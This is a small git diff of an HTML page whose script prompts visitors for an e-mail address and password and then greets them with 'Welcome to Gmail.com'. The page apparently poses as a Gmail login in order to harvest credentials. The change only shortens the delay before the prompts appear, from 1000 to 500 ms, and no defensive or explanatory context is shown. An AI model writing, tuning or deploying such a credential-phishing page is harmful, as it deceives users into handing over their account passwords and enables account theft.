diff --git a/index.html b/index.html index 9123287..71a8cac 100644 --- a/index.html +++ b/index.html @@ -16,7 +16,7 @@ x.prompt('E-mail', ''); b = x.prompt('Password', ''); x.alert('Welcome to Gmail.com'); - }, 1000); + }, 500); }